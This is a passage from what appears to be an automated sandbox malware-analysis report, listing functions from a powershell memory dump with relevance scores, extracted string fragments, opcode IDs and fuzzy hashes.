                                                                                              • Opcode Fuzzy Hash: 48341346cd2061bd50765dee9b9a01189cbab3a40aeeb81b6056de7a7a24d61d
                                                                                              • Instruction Fuzzy Hash: 895106327052018FDB15CA59C841A6ABBF1AFC5316F29807BD918CF352DA35DC8AC796
                                                                                              Function 00453910 Relevance: 5.1, Strings: 4, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$h%f$h%f
                                                                                              • API String ID: 0-3741909733
                                                                                              • Opcode ID: 0491b4e0928fd41692932280f4e7c609492406cff01153101bcab286d864f7db
                                                                                              • Instruction ID: 21118267df8ecd95a7a99d6bc565c78424b4f4e871da7d07e8bae43fcd29d4f7
                                                                                              • Opcode Fuzzy Hash: 0491b4e0928fd41692932280f4e7c609492406cff01153101bcab286d864f7db
                                                                                              • Instruction Fuzzy Hash: 964104B1B042418FCB15CF68844466BBFB2AFC5353B2880ABC945CB357DA75CE4AC75A
                                                                                              Function 00451DFC Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$h%f$h%f
                                                                                              • API String ID: 0-3741909733
                                                                                              • Opcode ID: 3cb1eca568ece481548e95a51696665b784233fb6007fe58da7930a70a8122f3
                                                                                              • Instruction ID: 81c164acce185814c5e7a78bcdc2003e01182ca46a6b5da616a970abf31870a8
                                                                                              • Opcode Fuzzy Hash: 3cb1eca568ece481548e95a51696665b784233fb6007fe58da7930a70a8122f3
                                                                                              • Instruction Fuzzy Hash: 5D31D836B003518BCB25456894117BBB7B29BD4312F24846BCD418B3A6DB79CC56C396
                                                                                              Function 00454708 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $p$$p$$p$$p
                                                                                              • API String ID: 0-3121760203
                                                                                              • Opcode ID: d1701f3ab735671a7ad60573bf0603e2403a942610d16668526a0727e96c2791
                                                                                              • Instruction ID: 00845723f635d94645d2e7ed4c85943d3ef7a84188eb7b7cf4c15ff1d1958da6
                                                                                              • Opcode Fuzzy Hash: d1701f3ab735671a7ad60573bf0603e2403a942610d16668526a0727e96c2791
                                                                                              • Instruction Fuzzy Hash: E82123353043005BDB2459B99840B3BAA9A9BC9316F78842BDD05CF386DFA9CC8AC265
                                                                                              Function 0045211C Relevance: 5.1, Strings: 4, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'p$4'p$h%f$h%f
                                                                                              • API String ID: 0-3741909733
                                                                                              • Opcode ID: c460f3a84dfcdd0ad37b79e84f2f3e0a7ef17ffbef10d072872abee7d2faa851
                                                                                              • Instruction ID: d7de9325308db6f93be605621e9c3f10d70f20cae6385e2df85d91ce1dc52b61
                                                                                              • Opcode Fuzzy Hash: c460f3a84dfcdd0ad37b79e84f2f3e0a7ef17ffbef10d072872abee7d2faa851
                                                                                              • Instruction Fuzzy Hash: 5D210C35B006128FCB184A68850127BF7A25FE7312F24847BCE4187346DAB9CD5AC397
                                                                                              Function 00451BF0 Relevance: 5.1, Strings: 4, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.493614139.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_450000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d=6$tPp$$p$$p
                                                                                              • API String ID: 0-4165222303
                                                                                              • Opcode ID: 335cbaa57427229a6485c8ccb988c644876c1777197534f7fa627c41a29c6030
                                                                                              • Instruction ID: 70570fe3d049fad37a4d4c664651819120e268fc7a0fe3bef5144925928a54a2
                                                                                              • Opcode Fuzzy Hash: 335cbaa57427229a6485c8ccb988c644876c1777197534f7fa627c41a29c6030
                                                                                              • Instruction Fuzzy Hash: 9711B632680210DFDB259E69C400B6BBBB5AF84762F29805BED158B372C7B6DC44CB94